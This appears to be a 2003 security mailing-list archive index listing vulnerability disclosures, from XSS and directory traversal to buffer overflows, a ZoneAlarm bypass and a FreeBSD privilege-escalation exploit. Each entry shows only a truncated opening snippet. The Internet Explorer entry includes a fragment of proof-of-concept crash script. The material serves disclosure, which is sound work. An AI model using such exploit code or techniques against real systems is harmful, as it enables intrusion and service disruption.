Local file retrieving in QNX Internet Appliance Toolkit http-daemon (web.server)

2003-06-23 Thread Michael Bemmerl
Local file retrieving in QNX Internet Appliance Toolkit http-daemon (web.server) Vendor-URL: http://www.qnx.com Description: ---- I recently found a 3,5-disk labeled with QNX-demo on my desk. This is the Take the 1.44M Web Challenge!-disk I got it in 1998. I couldn't find the demo on the

pMachine (PHP) : Include() Security Hole

2003-06-23 Thread Frog Man
Informations : ° Language : PHP Version : Free 2.2.1 Website : http://www.pmachine.com Problem : Include() Security Hole PHP Code/Location : °°° This will work if register_globals is ON *OR* OFF. /pm/lib.inc.php :

Myserver 0.4.1 DOS..

2003-06-23 Thread eip
hi... Topic: MyServer 0.4.1 DOS Product:Myserver 0.4.1 (http://myserverweb.sourceforge.net) Note: yep, I'm on the dole, anyone wanna give me a job :) Vendor Notification:Wps, sorry i forgot ;) Background: (from homepage) MyServer is a free and easy to

Many XSS Vulnerabilities in XMB Forum.

2003-06-23 Thread Knight Commander
Many XSS Vulnerabilities in XMB Forum. Program Name : XMB Forum AffectedVersion : 1.8 Partagium (may be the newest version) Home Page: http://www.xmbforum.com Author : Knight Commander (at hackervn.net) +Vul: In this link:

[KSA-001] Multiple vulnerabilities in Tutos

2003-06-23 Thread François SORIN
= Kereval Security Advisory [KSA-001] Multiple vulnerabilities in Tutos = PROGRAM: Tutos HOMEPAGE: http://www.tutos.org VULNERABLE VERSIONS: 1.1 RISK: Medium/High IMPACT: Cross Site Scripting RELEASE

GNATS (The GNU bug-tracking system) multiple buffer overflow vulnerabilities.

2003-06-23 Thread dong-h0un U
INetCop Security Advisory #2003-0x82-018 Title: GNATS (The GNU bug-tracking system) multiple buffer overflow vulnerabilities. 0x01. Description About: GNATS is a portable

Bypassing ZoneAlarm (limited)

2003-06-23 Thread aceh
Hi everyone. I don't know if this is a new issue but it is a simple way to bypass (in some limited form) ZoneAlarm's Application level Internet access blocking. Windows dll shell32.dll exports a well known and documented function called ShellExecute. From Win32 Programmer's refference:

gid bin from /usr/ports/korean/elm (FreeBSD)

2003-06-23 Thread Knud Erik Højgaard
Sorry, no pretty describing document this time. -- kokanin DSR-korean-elm.pl---txt.poo.av.is.gay Description: Binary data

Re: gid bin from /usr/ports/korean/elm (FreeBSD)

2003-06-23 Thread Knud Erik Højgaard
Knud Erik Højgaard wrote: Sorry, no pretty describing document this time. Oops, haste makes waste. The shellcode is by eSDee, not zillion. -- kokanin

Re: Algorimic Complexity Attacks

2003-06-23 Thread Pavel Kankovsky
On Sun, 8 Jun 2003, Nicholas Weaver wrote: IF the hash is good, FINDING collisions doesn't necessarily help the attacker, as the attacker really needs to generate lots of collisions to make the searches O(n) instead of O(1), since that is teh key behind this attack. First, I myself assume

PerlEdit

2003-06-23 Thread morning_wood
-- - EXPL-A-2003-010 exploitlabs.com Advisory 010 -- -= PerlEdit =- exploitlabs.com June 21, 2003 Vunerability: -

Internet Explorer =5.0 : Buffer overflow

2003-06-23 Thread Digital Scream
lt;scriptgt; wnd=open(about:blank,,); wnd.moveTo(screen.Width,screen.Height); WndDoc=wnd.document; WndDoc.open(); WndDoc.clear(); buffer=; for(i=1;i=127;i++)buffer+=X; buffer+=DigitalScream; WndDoc.write(HR align='+buffer+'); WndDoc.execCommand(SelectAll); WndDoc.execCommand(Copy);

TA-2003-06 Denial of Service Attack against Armida Databased WebServer v1.0

2003-06-23 Thread [EMAIL PROTECTED]
TA-2003-06 Denial of Service Attack against Armida Databased Web Server v1.0 contributed by: rushjo Tripbit Security Advisory TA-2003-06 Denial of Service Attack against Armida Databased Web Server v1.0

TA-2003-06 php-form-misconfiguration in VisNetic WebMail v.5.8.6.6

2003-06-23 Thread [EMAIL PROTECTED]
TA-2003-06 php-form-misconfiguration in VisNetic WebMail v.5.8.6.6 contributed by: rushjo = Tripbit Security Advisory TA-2003-06 php-form-misconfiguration in VisNetic WebMail v.5.8.6.6

Invalid SquirrelMail Exploit

2003-06-23 Thread Jonathan Angliss
Hi, I'm writing to correct a fatal reporting that was posted to one of the security focus mailing lists about SquirrelMail. It discusses files being accessible via the SquirrelMail website, and criticizes SquirrelMail to be at fault. The details for the exploit can be seen on the bugtraq

XSS Exploit In phpBB viewtopic.php

2003-06-23 Thread silent needle
XSS Exploit In phpBB viewtopic.php A: BACKGROUND [from phpbb.com] phpBB is a high powered, fully scalable, and highly customisable open- source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful

Sambar Server : Crashing service with search.pl

2003-06-23 Thread Lorenzo Manuel Hernandez Garcia-Hierro
Product: Sambar Server Vendor: Sambar Technologies Versions: VULNERABLE - 6.0 ? - 5.x - 4.x - 3.x NOT VULNERABLE - ? - Description: Multi-threaded, extensible

TA-2003-06 Directory Transversal Vulnerability in iWeb Server 2

2003-06-23 Thread [EMAIL PROTECTED]
TA-2003-06 Directory Transversal Vulnerability in iWeb Server 2 contributed by: rushjo == Tripbit Security Advisory TA-2003-06 Directory Transversal Vulnerability in iWeb Server 2

RE: PALM DESKTOP SOFTWARE / WIN 2000

2003-06-23 Thread Phillip R. Paradis
-Original Message- From: Christopher Rector [mailto:[EMAIL PROTECTED] Sent: Thursday, June 19, 2003 9:11 AM To: Scott R. Patronik Subject: Re: PALM DESKTOP SOFTWARE / WIN 2000 If a user logged in and the workstation is locked, the answer is yes the user can still retrieve